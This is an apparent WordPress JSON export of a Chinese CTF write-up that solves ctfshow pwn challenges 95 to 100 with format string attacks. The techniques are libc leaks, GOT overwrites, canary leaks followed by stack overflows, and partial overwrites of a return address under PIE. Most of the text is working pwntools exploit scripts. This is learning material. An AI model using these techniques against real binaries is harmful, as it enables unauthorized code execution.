    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/p>\n\n\n\n
    \u67e5\u627e\u504f\u79fb\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u504f\u79fb\u662f6\uff0c\u9996\u5148\u60f3\u5230\u7528system_plt\u8986\u76d6printf_got\uff0c\u4f46\u662f\u8fd9\u9053\u9898\u6ca1\u6709system\u51fd\u6570\uff0c\u6211\u4eec\u9700\u8981\u5148\u6cc4\u9732libc<\/p>\n\n\n\n
    from pwn import *\ncontext(arch='i386',log_level='debug')\n#p=process(\".\/pwn95\")\np=remote(\"pwn.challenge.ctf.show\",28257)\nelf=ELF(\".\/pwn95\")\nprintf_got = elf.got['printf']\npayload = p32(printf_got) + b'%6$s'\np.send(payload)\nprintf = u32(p.recvuntil('\\xf7')[-4:])\nprint(hex(printf))\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u4e0b\u8f7d\u4e00\u4e2a\u5408\u9002\u7684\u5728\u672c\u5730\u7136\u540e\u5c31\u548c\u4e4b\u524d\u4e00\u6837\u4e86<\/p>\n\n\n\n
    \u597d\u5de7\u4e0d\u5de7\uff0c\u8fd9\u4e2a\u7f51\u7ad9\u4f3c\u4e4e\u4e0d\u592a\u9760\u8c31\u4e86\uff0c\u53ea\u80fd\u8bd5\u8bd5LibcSearcher<\/p>\n\n\n\n
    from pwn import *\nfrom LibcSearcher import *\ncontext(arch='i386',log_level='debug')\n#p=process(\".\/pwn95\")\np=remote(\"pwn.challenge.ctf.show\",28257)\nelf=ELF(\".\/pwn95\")\n#libc=ELF(\".\/libc-2.34.so\")\nprintf_got = elf.got['printf']\npayload = p32(printf_got) + b'%6$s'\np.send(payload)\nprintf = u32(p.recvuntil('\\xf7')[-4:])\nprint(hex(printf))\n#base=printf-libc.sym['printf']\n#system=base+libc.sym['system']\nlibc = LibcSearcher('printf',printf)\nlibc_base = printf - libc.dump('printf')\nsystem = libc_base + libc.dump('system')\n\npayload=fmtstr_payload(6,{printf_got:system})\np.send(payload)\np.sendline(b'\/bin\/sh')\np.recv()\np.interactive()\n<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    6\u3001pwn96<\/h2>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u8fd9\u91cc\u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u770b\u504f\u79fb<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u4ed6\u76f4\u63a5\u6267\u884c\u5b8c\u4e86\uff0c\u56e0\u4e3a\u6211\u4eec\u672c\u5730\u6ca1\u6709\u8fd9\u4e2a\u6587\u4ef6\uff0c\u8fdc\u7a0b\u8fd0\u884c\u4e00\u4e0b<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u4f46\u662f\u5176\u5b9e\u8ba9\u4ed6\u683c\u5f0f\u5316\u8f93\u51fa\u5c31\u662f\u6709flag,\u53ea\u662f\u662f\u5012\u5e8f\u7684\uff0c\u6211\u611f\u89c9\u6709\u70b9\u9634\u554a><<\/p>\n\n\n\n
    ctfshow{ }\u8f6c\u6362\u621016\u8fdb\u5236\u5012\u5e8f\u770b\u770b<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    63 74 66 73 68 6f 77<\/code><\/pre>\n\n\n\n
    \u5012\u5e8f\u5c31\u662f0x73667463 0x7b776f68<\/p>\n\n\n\n
    \u7136\u540e{ }\u768416\u8fdb\u5236\u662f7b\u548c7d,\u627e\u5230\u8303\u56f4\u540e\u76f4\u63a5\u624b\u52a8\u6362\u4e00\u4e0b\u5c31\u884c<\/p>\n\n\n\n
    0x73667463-0x7b776f68-0x34323034-0x38376165-0x6562362d-0x64342d31-0x382d3039-0x2d386562-0x38646537-0x32363165-0x30643438-0xa7d\n\n63746673686f777b34303234656137382d366265312d346439302d386265382d3765643865313632383464307d<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    7\u3001pwn97\uff08\u8986\u5199\u67d0\u4e2a\u503c\u6ee1\u8db3\u67d0\u6761\u4ef6\u597d\u50cf\u5c31\u53ef\u4ee5\u4e86\uff09<\/h2>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    32\u4f4dcanary\u3001NX<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u627e\u4e00\u4e0b\u504f\u79fb\u662f11<\/p>\n\n\n\n
    \u60f3\u8981\u62ff\u5230flag\u9700\u8981\u5347\u7ea7\u6743\u9650\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u8fd9\u91cc\u6709\u4e00\u4e2acheck\u9700\u8981check\u4e3a\u771f\uff0c\u5c31\u662f\u503c\u4e0d\u4e3a0\uff0c\u6211\u4eec\u901a\u8fc7\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u53bb\u6539\u5199check\u7684\u503c<\/p>\n\n\n\n
    check\u57280x804B040,\u5229\u7528fmtstr\u628a\u8fd9\u4e2a\u4f4d\u7f6e\u6539\u4e3a2<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    from pwn import*\ncontext.log_level='debug'\n#p=process(\".\/pwn97\")\np=remote('pwn.challenge.ctf.show',28250)\ncheck=0x804B040\noffset=11\npayload=fmtstr_payload(11,{check:2})\np.send(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    8\u3001pwn98(Canary\uff1f\u6709\u6ca1\u6709\u529e\u6cd5\u7ed5\u8fc7\u5462\uff1f)<\/h2>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u786e\u5b9e\u6709canary\u4fdd\u62a4<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u6709\/bin\/sh\u5b57\u7b26\u4e32<\/p>\n\n\n\n

    \u6709\u4e00\u4e2acheck\uff0c\u6211\u4eec\u9700\u8981\u7ed5\u8fc7canary\u4fdd\u62a4\u6267\u884c\u8fd9\u91cc\u5c31\u80fdgetshell<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6700\u540e\u8fd4\u56de\u7684\u662fcanary\u548cv2\u7684\u4e0e\u503c\uff0c\u76f8\u540c\u5c31\u53ef\u4ee5\u901a\u8fc7\u4fdd\u62a4\u8fd4\u56de\u6211\u4eec\u60f3\u5230\u7684\u5730\u5740<\/p>\n\n\n\n
    printf\u90a3\u91cc\u662f\u660e\u663e\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u5f53\u7136\u7ed5\u8fc7\u4ee5\u540e\u53ef\u4ee5\u5229\u7528\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u4e5f\u8bb8\u53ef\u4ee5\u6cc4\u9732canary<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u504f\u79fb\u91cf\u662f5\uff0c\u4f46\u662f\u6211\u4eec\u8981\u7684\u662fcanary\uff0c\u4f4e\u5b57\u8282\u4e3a00\uff0c\u6211\u4eec\u7528%x\u6765\u6cc4\u9732<\/p>\n\n\n\n
    s\u5230\u6808\u9876\u7684\u8ddd\u79bb\u662f0x34,canary\u8ddd\u79bbebp 0cx\uff0c\u7b97\u4e0b\u6765\u662f\uff080x34-0xc\uff09\/4+5=15<\/p>\n\n\n\n
    canary\u5728\u7b2c15\u4e2a\u53c2\u6570<\/p>\n\n\n\n
    from pwn import *\ncontext.log_level='debug'\n#p=process(\".\/pwn98\")\np=remote(\"pwn.challenge.ctf.show\",28202)\ncheck=0x80486CE\npayload=\"%15$x\"\np.recv()\np.sendline(payload)\nres=p.recv()\ncanary=int(res,16)\nprint(f'canary: {hex(canary)}')\np.interactive()                       <\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u63a5\u4e0b\u6765\u518d\u52a0\u4e0a\u6808\u6ea2\u51fa\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n
    from pwn import *\ncontext.log_level='debug'\n#p=process(\".\/pwn98\")\np=remote(\"pwn.challenge.ctf.show\",28202)\ncheck=0x80486CE\npayload=\"%15$x\"\np.recv()\np.sendline(payload)\nres=p.recv()\ncanary=int(res,16)\nprint(f'canary: {hex(canary)}')\npayload1=b'a'*(0x34-0xc)+p32(canary)+b'a'*0xc+p32(check)\np.sendline(payload1)\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    9\u3001pwn99<\/h1>\n\n\n\n
    fmt\u76f2\u6253\uff08\u4e0d\u662f\u5fd8\u8bb0\u653e\u9644\u4ef6\uff0c\u662f\u672c\u8eab\u5c31\u6ca1\u9644\u4ef6\uff01\uff01\uff01\uff09<\/p>\n\n\n\n
    \u8fde\u4e0a\u4ee5\u540e\u8bf4Hint : Flag is on Stack !<\/p>\n\n\n\n
    \u4ec0\u4e48\u9b3c\uff0c\u8fd8\u6709\u65e5\u8bed<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u539f\u6765\u662f\u706b\u5f71\u91cc\u9762\u7684\u4f60\u4e5f\u60f3\u8d77\u821e\u5417<\/p>\n\n\n\n
    \u6709\u70b9\u4e71\uff0c\u6362\u6210x<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u8fd8\u662f\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u4efb\u610f\u8bfb\u5728\u6808\u4e0a\u8bfb\u53d6flag<\/p>\n\n\n\n
    \u8fd8\u662f\u5199\u4e00\u4e2a\u811a\u672c\u53bb\u6cc4\u9732\u5427<\/p>\n\n\n\n
    from pwn import *\ncontext.log_level = 'error'\ndef send_payload(payload):\n    p=remote(\"pwn.challenge.ctf.show\",28170)\n    p.recv()\n    p.sendline(payload)\n    res=p.recvuntil(b\"\\n\",drop=True)\n    if res.startswith(b\"0x\"):\n        print(p64(int(res,16)))\n    p.close()\n\ni=1\nwhile 1:\n    payload='%{}$p'.format(i)\n    send_payload(payload)\n    i=i+1<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u4f46\u662f\u4e24\u6b21\u8dd1\u51fa\u6765\u90fd\u4e0d\u4e00\u6837\uff0c\u6709\u70b9\u602a\u602a\u7684\uff0c\u4f46\u662f\u62fc\u63a5\u8d77\u6765\u5c31\u662f\u5168\u7684<\/p>\n\n\n\n
    10\u3001pwn100<\/h1>\n\n\n\n
    \u6709\u4e9b\u4e1c\u897f\u597d\u50cf\u9700\u8981\u4e00\u5b9a\u6761\u4ef6<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    64\u4f4d\uff0c\u4fdd\u62a4\u5f00\u7684\u5413\u4eba<\/p>\n\n\n\n
    \u8fdb\u53bb\u9996\u5148\u662f\u4e00\u4e2a\u8f93\u5165\u65f6\u95f4\u7684\u73af\u8282<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6682\u65f6\u6ca1\u6709\u5229\u7528\u7684<\/p>\n\n\n\n
    leak:<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    buf\u6307\u9488\u5904\u8bfb1\u5b57\u8282\u8f93\u51fa\uff0c\u770b\u80fd\u4e0d\u80fd\u63a7\u5236buf\u6307\u9488<\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u770b\u770bfmt_attack<\/p>\n\n\n\n
    unsigned __int64 __fastcall fmt_attack(int *a1)\n{\n  char format[56]; \/\/ [rsp+10h] [rbp-40h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+48h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  memset(format, 0, 0x30u);\n\/\/\u4e0b\u9762\u8fd9\u4e2a\u5224\u65ad\u5c31\u662f\u770b\u8fd9\u4e2a\u51fd\u6570\u6709\u6ca1\u6709\u88ab\u4f7f\u7528\u8fc7\n  if ( *a1 > 0 )\n  {\n    puts(\"No way!\");\n    exit(1);\n  }\n\/\/\u4f3c\u4e4e\u53ea\u80fd\u4f7f\u7528\u4e00\u6b21\n  *a1 = 1;\n  read_n(format, 40, format);\n  printf(format);\/\/\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\n  return __readfsqword(0x28u) ^ v3;\n}<\/code><\/pre>\n\n\n\n
    \u6709\u4e00\u4e2a\u60f3\u60f3\u8f6f\u8f6f\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u4f46\u662f\u53ea\u80fd\u4f7f\u7528\u4e00\u6b21\uff0c\u5982\u679c\u80fd\u63a7\u5236*a1\u5c31\u597d\u4e86<\/p>\n\n\n\n
    \u6211\u4eec\u53ef\u4ee5\u5728\u7ed9*a1\u8d4b\u503c\u7684\u5730\u65b9\u4e0b\u4e00\u4e2a\u65ad\u70b9\u770b\u770b<\/p>\n\n\n\n
    \u6765\u770b\u770b\u6bd4\u8f83\u5173\u5fc3\u7684get_flag<\/p>\n\n\n\n
    void __noreturn get_flag()\n{\n  char *v0; \/\/ rdx\n  int fd; \/\/ [rsp+Ch] [rbp-64h]\n  char s2[88]; \/\/ [rsp+10h] [rbp-60h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+68h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  memset(s2, 0, 0x50u);\n  puts(\"Flag is here ! Come on !!\");\n  read_n(s2, 64, v0);\n\/\/\u6211\u4eec\u5f97\u77e5\u9053secret\n  if ( !strncmp(secret, s2, 0x40u) )\n  {\n    close(1);\n    fd = open(\"\/flag\", 0);\n    read(fd, s2, 0x50u);\n    printf(s2);\/\/\u4e5f\u6709\u4e00\u4e2a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\n    exit(0);\n  }\n  puts(\"No way!\");\n  exit(1);\n}<\/code><\/pre>\n\n\n\n
    \u90a3\u76ee\u524d\u6211\u4eec\u60f3\u8981fmt_attack\u53ef\u4ee5\u91cd\u590d\u5229\u7528\uff0c\u6cc4\u9732\u6211\u4eec\u60f3\u8981\u7684\u4e1c\u897f\u6216\u8005\u8df3\u8f6c\u6267\u884c<\/p>\n\n\n\n
    \u6211\u4eec\u770b\u6c47\u7f16\u91cc\u9762<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u8d4b\u503c\u7684\u5730\u5740\u662f0x000EA9,\u6211\u4eec\u53ef\u4ee5\u4e0b\u4e00\u4e2a\u65ad\u70b9\u57280x000EA5,\u4e5f\u53ef\u4ee5\u76f4\u63a5\u65ad\u5728fmt_attack<\/p>\n\n\n\n
    \u8fd9\u91cc\u7684\u8bdd\u5982\u679c\u8c03\u8bd5\u6ca1\u6709\u5b66\u53f7\u5c31\u4f1a\u6709\u4e2a\u5751\uff0c\u7a0b\u5e8f\u5f00\u4e86pie\u6211\u4eec\u6253\u65ad\u70b9\u9700\u8981\u77e5\u9053\u57fa\u5740<\/p>\n\n\n\n

    \u6211\u4eec\u5148start\u8ba9\u7a0b\u5e8f\u8dd1\u8d77\u6765\uff0c\u7136\u540epiebase\u770b\u770b\u57fa\u5740\u518d\u6253\u65ad\u70b9\u5c31\u6b63\u5e38\u4e86<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    RAX: 0x7fffffffde6c <- 1<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    rax\u7684\u503c\u662f0x7fffffffde10\uff0c\u5c31\u662f\u4f2a\u4ee3\u7801\u91cc\u9762a1\u7684\u5730\u5740<\/p>\n\n\n\n
    \u968f\u540e\u6211\u4eec\u9700\u8981\u770b\u770bprintf\u5904\u7684\u504f\u79fb\uff0c\u76f4\u63a5\u8fd0\u884c\u8fc7\u53bb<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u504f\u79fb\u9700\u8981\u52a0\u4e0a64\u4f4d\u4f20\u53c2\u76846\u4e2a\u5bc4\u5b58\u5668\uff0c\u504f\u79fb\u4e3a7\uff0c\u6211\u4eec\u4f7f\u7528%7$n\u53ef\u4ee5\u4fee\u6539a1\u7684\u503c\u4e3a0\u5c31\u53ef\u4ee5\u91cd\u590d\u5229\u7528<\/p>\n\n\n\n
    \u597d\u5566\uff0c\u91cd\u590d\u5229\u7528\u7684\u95ee\u9898\u89e3\u51b3\u4e86\uff0c\u63a5\u4e0b\u6765\u6211\u4eec\u8981\u8df3\u8f6c\u6267\u884c\u540e\u95e8\u51fd\u6570\uff0c\u4e4b\u524d\u5206\u6790\uff0c\u6211\u4eec\u9700\u8981\u8df3\u8f6c\u5230close\u4e4b\u540e\uff0c\u4f46\u662f\u6709canary\u4fdd\u62a4<\/p>\n\n\n\n
    \u4e00\u79cd\u89e3\u6cd5\u5c31\u662f\u52ab\u6301 fmt_attack \u7684\u8fd4\u56de\u5730\u5740 \u2192 \u63a7\u5236 RIP<\/strong><\/p>\n\n\n\n
    \u5229\u7528pie\u7684\u7279\u6027\uff0c\u5b9e\u9645\u5730\u5740=piebase+\u504f\u79fb\uff0c\u800c\u4e14\u53ea\u9700\u8981\u4fee\u6539\u4f4e2\u5b57\u8282<\/strong><\/p>\n\n\n\n
    \u8fd9\u4e2a\u5c31\u662f partial overwrite<\/strong><\/p>\n\n\n\n
    \u4e5f\u5c31\u662f\u6211\u4eec\u53ea\u9700\u8981\u9700\u6539\u4f4e2\u5b57\u8282\u5c31\u53ef\u4ee5<\/p>\n\n\n\n
    piebase\u5176\u5b9e\u6211\u4eec\u5df2\u7ecf\u77e5\u9053\u4e860x555555400000<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6211\u4eec\u9700\u8981\u8df3\u52300x000F56+0x555555400000=0x5555 5540 0F56<\/p>\n\n\n\n
    \u4f46\u662f\u73b0\u5728\u4e0d\u77e5\u9053\u5728\u54ea\u4e2a\u4f4d\u7f6e\u5199\uff0c\u8fd8\u9700\u8981\u8c03\u8bd5\u770b\u770b<\/p>\n\n\n\n
    \u73b0\u5728\u8fd8\u662f\u8fd0\u884c\u5230printf\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
    \u6211\u4eec\u5148\u8fd0\u884c\u770b\u770b\u521a\u521a\u4fee\u6539a1=0\u7684\u6548\u679c<\/p>\n\n\n\n
    from pwn import *\ncontext(arch='amd64',log_level='debug')\np=remote(\"pwn.challenge.ctf.show\",28203)\n#p=prosecc(\".\/pwn100\")\n\ndef time_start():\n    p.sendlineafter('What time is it :',b'1 1 1')\n\ndef fmt_attack(payload):\n    p.sendlineafter('>>',str(2))\n    p.sendline(payload)\n\npayload1=b'%7$n'\npaylaod2=b'%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'\ntime_start()\n\u4fee\u6539a1\nfmt_attack(payload1)\n\u7b2c\u4e8c\u6b21\u5229\u7528\u68c0\u9a8c\u4fee\u6539\nfmt_attack(paylaod2)\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u53ef\u4ee5\u53d1\u73b0\u6211\u4eec\u5229\u7528\u6210\u529f<\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u6211\u4eec\u9700\u8981\u6cc4\u9732\u8fd4\u56de\u5730\u5740\uff0c\u65b9\u4fbf\u7b49\u4f1a\u513f\u5229\u7528<\/p>\n\n\n\n
    \u6211\u4eec\u8c03\u8bd5\u7a0b\u5e8f\u5230printf\u5904<\/p>\n\n\n\n
    \u5f97\u5230\u5f53\u524d\u51fd\u6570 fmt_attack \u7684RBP<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u8c03\u7528\u6808\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u73b0\u5728\u770b\u770bmain\u51fd\u6570\u7684\u6c47\u7f16\uff0c\u9700\u8981\u77e5\u9053main\u51fd\u6570\u7684\u53d8\u91cf\u5927\u5c0f<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    0x20<\/p>\n\n\n\n
    \u6211\u4eec\u5206\u6790\u4e00\u4e0b\u6808<\/p>\n\n\n\n
      \n
    • \u9ad8\u5730\u5740<\/li>\n\n\n\n
    • main_rbp\uff080x8\uff09<\/li>\n\n\n\n
    • main\u53d8\u91cf\uff080x20\uff09<\/li>\n\n\n\n
    • fmt_attack\u8fd4\u56de\u5730\u5740<\/li>\n\n\n\n
    • fmt_attack_rbp<\/li>\n\n\n\n
    • fmt_attack\u53d8\u91cf<\/li>\n\n\n\n
    • \u4f4e\u5730\u5740<\/li>\n<\/ul>\n\n\n\n
      \u6240\u4ee5\u5f88\u6e05\u6670ret_addr=mian_rbp-0x28<\/p>\n\n\n\n
      \u6211\u4eec\u8981\u628arbp\u6cc4\u9732\u51fa\u6765\uff0c\u5176\u5b9e\u52a8\u52a8\u8111\u5b50\uff0c\u504f\u79fb\u662f0xa+6=16<\/h3>\n\n\n\n
      from pwn import *\ncontext(arch='amd64',log_level='debug')\np=remote(\"pwn.challenge.ctf.show\", 28223)\n#p=process(\".\/pwn100\")\n\ndef time_start():\n    p.sendlineafter('What time is it :',b'1 1 1')\n\ndef fmt_attack(payload):\n    p.sendlineafter('>>',str(2))\n    p.sendline(payload)\n\n#elf_base=0x555555400000\n#payload1=b'%7$n'\n#paylaod2=b'%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'\ntime_start()\n#\u4fee\u6539a1\n#fmt_attack(payload1)\n#\u7b2c\u4e8c\u6b21\u5229\u7528\u68c0\u9a8c\u4fee\u6539\n#fmt_attack(paylaod2)\n#p.interactive()\n#\u6cc4\u9732\u51fa\u8fd4\u56de\u5730\u5740,\u504f\u79fb16\uff0c'-'\u662f\u6807\u5fd7\npayload3=b'%7$n-%16$p'\nfmt_attack(payload3)\np.recvuntil('-')\nmain_rbp=int(p.recvuntil('\\n')[:-1],16)\nret_addr=main_rbp-0x28\nprint(hex(ret_addr))<\/code><\/pre>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n
      \u63a5\u4e0b\u6765\u5c31\u8981\u8ba1\u7b97elf\u57fa\u5740\uff0c\u4f46\u662f\u6211\u4eec\u4e00\u5f00\u59cb\u5c31\u77e5\u9053\u4e86\u5440\uff0c\u76f4\u63a5\u5c31\u662f\uff1a0x555555400000<\/p>\n\n\n\n
      \u8ba1\u7b97elf\u57fa\u5740\uff0c\u56e0\u4e3a\u6709pie<\/h3>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n
      \u6211\u4eec\u770b\u5230\u8fd9\u4e2ajump\uff0c\u662fprintf\u4e4b\u540e\u7684jump<\/p>\n\n\n\n
      \u770b\u770bmain\u7684\u6c47\u7f16\u5c31\u77e5\u9053\u504f\u79fb\u662f0x0102<\/p>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n
      \u63a5\u6536\u5230\u7684\u5b9e\u9645\u5730\u5740\uff08\u504f\u79fb\u4e3a17\uff09=elf_base-0x0102<\/p>\n\n\n\n
      \u6240\u4ee5<\/p>\n\n\n\n
      #\u8ba1\u7b97elf\u57fa\u5740\npayload4=b'%7$n+%17$p'\nfmt_attack(payload4)\np.recvuntil('+')\nret_value = int(p.recvuntil('\\n')[:-1],16)\nelf_base = ret_value - 0x102c\nprint(hex(elf_base))<\/code><\/pre>\n\n\n\n
      \u6700\u540e\u76f4\u63a5\u6765\u5230\u4fee\u6539\u8fd4\u56de\u5730\u5740\u7684\u4efb\u610f\u5199\u90e8\u5206<\/h3>\n\n\n\n
      \u6211\u4eec\u8981\u7528%hn\uff080x0~0xffff\uff09\u6765\u5199\u5165\u4e24\u5b57\u8282\uff0c\u800c\u4e14\u662f\u4f4e2\u5b57\u8282<\/p>\n\n\n\n
      \u800c\u6211\u4eec\u5199\u8fdb\u53bb\u4ee5\u540e\u9700\u8981\u8003\u8651ret_addr\u4f20\u8fdb\u53bb\u65f6\u5e94\u8be5\u5b57\u6808\u4e0a\u7684\u90a3\u4e2a\u4f4d\u7f6e\uff0c\u6211\u4eec\u628aret_addr\u6362\u6210AAAAAAAA<\/p>\n\n\n\n
      from pwn import *\ncontext(arch='amd64',log_level='debug')\n#p=remote(\"pwn.challenge.ctf.show\",28203)\np=process(\".\/pwn100\")\n\ndef time_start():\n    p.sendlineafter('What time is it :',b'1 1 1')\n\ndef fmt_attack(payload):\n    p.sendlineafter('>>',str(2))\n    p.sendline(payload)\n\n#elf_base=0x555555400000\n#payload1=b'%7$n'\n#paylaod2=b'%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'\ntime_start()\n#\u4fee\u6539a1\n#fmt_attack(payload1)\n#\u7b2c\u4e8c\u6b21\u5229\u7528\u68c0\u9a8c\u4fee\u6539\n#fmt_attack(paylaod2)\n#p.interactive()\n#\u6cc4\u9732\u51fa\u8fd4\u56de\u5730\u5740,\u504f\u79fb16\uff0c'-'\u662f\u6807\u5fd7\npayload3=b'%7$n-%16p'\nfmt_attack(payload3)\np.recvuntil('-')\nret_addr=int(p.recvuntil('\\n')[:-1],16)\nprint(hex(ret_addr))\n\n#\u8ba1\u7b97elf\u57fa\u5740\npayload4=b'%7$n+%17p'\nfmt_attack(payload4)\np.recvuntil('+')\nret_value = int(p.recvuntil('\\n')[:-1],16)\nelf_base = ret_value - 0x102c\nprint(hex(elf_base))\n\np.recvuntil('>>')\np.sendline(str(2))\n#\u68c0\u9a8cret_addr\u5728\u6808\u4e0a\u7684\u4f4d\u7f6e\npayload5=(b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%1$hn').ljust(0x10,b'a') + b'AAAAAAAA'\ngdb.attach(p)\npause()\np.sendline(payload5)\npause()<\/code><\/pre>\n\n\n\n
      \u5148n\uff0c\u7136\u540e\u518d\u539f\u6765\u7a97\u53e3\u4efb\u610f\u952e\uff0cn\u8fdb\u6b65\u5230printf<\/p>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n

      4+6=10\u7684\u53c2\u6570\u4f4d\u7f6e
      \u63a5\u4e0b\u6765\u6539\u6210c%10$hn\u5c31\u884c<\/p>\n\n\n\n
      from pwn import *\ncontext(arch='amd64',log_level='debug')\np=remote(\"pwn.challenge.ctf.show\", 28223)\n#p=process(\".\/pwn100\")\n\ndef time_start():\n    p.sendlineafter('What time is it :',b'1 1 1')\n\ndef fmt_attack(payload):\n    p.sendlineafter('>>',str(2))\n    p.sendline(payload)\n\n#elf_base=0x555555400000\n#payload1=b'%7$n'\n#paylaod2=b'%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'\ntime_start()\n#\u4fee\u6539a1\n#fmt_attack(payload1)\n#\u7b2c\u4e8c\u6b21\u5229\u7528\u68c0\u9a8c\u4fee\u6539\n#fmt_attack(paylaod2)\n#p.interactive()\n#\u6cc4\u9732\u51fa\u8fd4\u56de\u5730\u5740,\u504f\u79fb16\uff0c'-'\u662f\u6807\u5fd7\npayload3=b'%7$n-%16$p'\nfmt_attack(payload3)\np.recvuntil('-')\nmain_rbp=int(p.recvuntil('\\n')[:-1],16)\nret_addr=main_rbp-0x28\nprint(hex(ret_addr))\n\n#\u8ba1\u7b97elf\u57fa\u5740\npayload4=b'%7$n+%17$p'\nfmt_attack(payload4)\np.recvuntil('+')\nret_value = int(p.recvuntil('\\n')[:-1],16)\nelf_base = ret_value - 0x102c\nprint(hex(elf_base))\n\n# p.recvuntil('>>')\n# p.sendline(str(2))\n#\u68c0\u9a8cret_addr\u5728\u6808\u4e0a\u7684\u4f4d\u7f6e\n#payload5=(b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%1$hn').ljust(0x10,b'a') + b'AAAAAAAA'\npayload5=(b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%10$hn').ljust(0x10,b'a') +p64(ret_addr)\n#gdb.attach(p)\n#pause()\nfmt_attack(payload5)\n#pause()\nflag=p.recvuntil('\\n')\nprint(flag)\nprint(hex(ret_addr))\nprint(hex(elf_base))\n<\/code><\/pre>\n\n\n\n
      \"\"<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"
      \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u5b57\u7b26\u4e32\uff0c\u4e32\uff0can…<\/p>\n","protected":false},"author":1,"featured_media":892,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4,7],"class_list":["post-864","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn","tag-7"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/864","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp